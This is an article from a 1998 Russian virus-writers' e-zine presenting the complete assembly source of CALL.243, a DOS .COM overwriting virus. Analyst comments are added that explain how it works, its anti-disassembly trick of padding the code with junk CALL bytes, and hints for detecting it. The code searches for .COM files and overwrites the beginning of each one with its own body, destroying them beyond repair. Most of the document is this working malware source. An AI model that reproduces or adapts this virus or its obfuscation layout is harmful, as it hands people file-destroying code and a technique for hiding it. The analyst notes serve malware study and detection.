[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 8, Nov 1998 file 005
Вирус CALL.243
by RedArc
Это обычный COM-Overwrite вирус. Его можно считать пародией на
классический вирус JUMP.466. В нем нет ничего интересного, разве что
посмотреть на него в HIEW'е... ;)
;Virus-Joke (c) by RedArc
;
; ---------------------------------------------------------------------
; Analyst notes (comments only; every instruction below is unchanged).
;
; Format: 16-bit DOS .COM image (org 100h), TASM syntax.
;
; Behaviour as read from the code:
;   1. Builds the ASCIIZ file mask "*.CoM" at offset 80h with STOSB.
;   2. INT 21h/4Eh (find first), then INT 21h/4Fh (find next) in a loop.
;   3. For each match: open read/write (3Dh, AL=02h), write VirLength
;      bytes taken from DS:0100h (40h), close (3Eh).
;   4. INT 20h (terminate) as soon as the search returns with CF set.
; Nothing from the target file is read or saved before the write, so the
; overwritten leading bytes of every matched file are lost; recovery
; means restoring the file from a clean backup.
;
; Layout trick (why a linear disassembly shows almost only CALLs):
;   each real operation is two bytes long (one-byte STOSB is padded with
;   NOP) and is preceded by `call labelN+1` plus a junk byte 0E8h at
;   labelN. The call appears to assemble as a direct near call
;   (E8 01 00) that steps over the junk byte -- 40 calls * 3 + 41 junk
;   bytes + 41 two-byte operations = 243, matching the length in the
;   page title. A linear listing pairs each junk E8 with the following
;   two bytes and decodes them as one more CALL.
;   No RET exists anywhere: the pushed return addresses are simply
;   discarded when SP is reloaded with `mov sp,bx`.
;
; Triage hints: dense repetition of the byte run E8 01 00 E8; the file
; mask is assembled one character at a time, so it does not appear as a
; plain string in the image; affected .COM files begin with the same
; VirLength-byte body.
;
; Assumptions the code relies on but does not establish itself
; (TODO confirm against the DOS version under analysis): AH = 0 on
; entry, DS = ES = PSP segment, direction flag clear.
; ---------------------------------------------------------------------
model tiny
.code
.386
org 100h
start:
call [label0+1]
label0:
db 0e8h                         ; junk byte, never executed (see notes)
mov al,80h                      ; AL = 80h; AX = 0080h only if AH was 0
call [label1+1]
label1:
db 0e8h
mov di,ax                       ; DI = write cursor for the mask (80h)
call [label2_0+1]
label2_0:
db 0e8h
mov dx,ax                       ; DX = start of the mask, used by 4Eh below
; --- build "*.CoM",0 at ES:DI, one character per MOV/STOSB pair ---
call [label2+1]
label2:
db 0e8h
mov al,'*'
call [label2_1+1]
label2_1:
db 0e8h
stosb
nop                             ; pad so the pair is 2 bytes
call [label2_2_0+1]
label2_2_0:
db 0e8h
mov al,'.'
call [label2_2_1+1]
label2_2_1:
db 0e8h
nop
stosb
call [label2_2+1]
label2_2:
db 0e8h
mov al,'C'
call [label2_3+1]
label2_3:
db 0e8h
stosb
nop
call [label2_3_0+1]
label2_3_0:
db 0e8h
mov al,'o'
call [label2_3_1+1]
label2_3_1:
db 0e8h
stosb
nop
call [label2_4+1]
label2_4:
db 0e8h
mov al,'M'
call [label2_5+1]
label2_5:
db 0e8h
nop
stosb
call [label2_6+1]
label2_6:
db 0e8h
mov al,0                        ; terminating NUL of the mask
call [label2_6_0+1]
label2_6_0:
db 0e8h
stosb
nop
; --- first search: INT 21h/4Eh, CX = attribute mask 00FEh, DS:DX = mask ---
call [label2_7+1]
label2_7:
db 0e8h
mov ah,4eh                      ; DOS find-first
call [label3+1]
label3:
db 0e8h
mov ch,0
call [label4+1]
label4:
db 0e8h
mov cl,0feh                     ; CX = 00FEh
; label5+1 is also the loop re-entry point: the last call in the body
; jumps back here with AH = 4Fh (find next).
call [label5+1]
label5:
db 0e8h
mov bh,0ffh
call [label6+1]
label6:
db 0e8h
mov bl,0feh                     ; BX = 0FFFEh
call [label7+1]
label7:
db 0e8h
mov sp,bx                       ; reset SP, dropping all pushed return addresses
call [label8+1]
label8:
db 0e8h
int 21h                         ; find first / find next, depending on AH
call [label9+1]
label9:
db 0e8h
jb NotFound                     ; CF from INT 21h; the CALL in between leaves flags alone
call [label10+1]
label10:
db 0e8h
jmp short TestFile
label10_1:
db 0e8h                         ; junk byte so INT 20h also decodes as part of a CALL
NotFound:
int 20h                         ; terminate: no (more) matching files
label10_2:
db 0e8h
; --- per-file step: open, overwrite the start, close ---
TestFile:
mov sp,bx                       ; BX is still 0FFFEh here
call [label11+1]
label11:
db 0e8h
mov ah,3dh                      ; DOS open
call [label12+1]
label12:
db 0e8h
mov al,02h                      ; access mode: read/write
call [label13+1]
label13:
db 0e8h
mov dh,0
call [label14+1]
label14:
db 0e8h
mov dl,9eh                      ; DX = 009Eh; presumably default DTA (80h) + 1Eh, the found file name
call [label15+1]
label15:
db 0e8h
int 21h
call [label16+1]
label16:
db 0e8h
mov bx,ax                       ; BX = returned handle; CF is not tested after the open
call [label17+1]
label17:
db 0e8h
mov ah,40h                      ; DOS write
call [label18+1]
label18:
db 0e8h
mov dh,1
call [label19+1]
label19:
db 0e8h
mov dl,0                        ; DX = 0100h, start of this program's own image
call [label20+1]
label20:
db 0e8h
mov ch,dl                       ; CH = 0
call [label21+1]
label21:
db 0e8h
mov cl,VirLength                ; CX = VirLength; 8-bit immediate, so the body must stay under 256 bytes
call [label22+1]
label22:
db 0e8h
int 21h                         ; write CX bytes from DS:DX to handle BX
call [label23+1]
label23:
db 0e8h
mov ah,3eh                      ; DOS close
call [label24+1]
label24:
db 0e8h
int 21h
call [label25+1]
label25:
db 0e8h
mov ah,4fh                      ; DOS find-next
call [label5+1]                 ; back to the search step
VirLength equ $-start           ; assembled size of the whole body
end start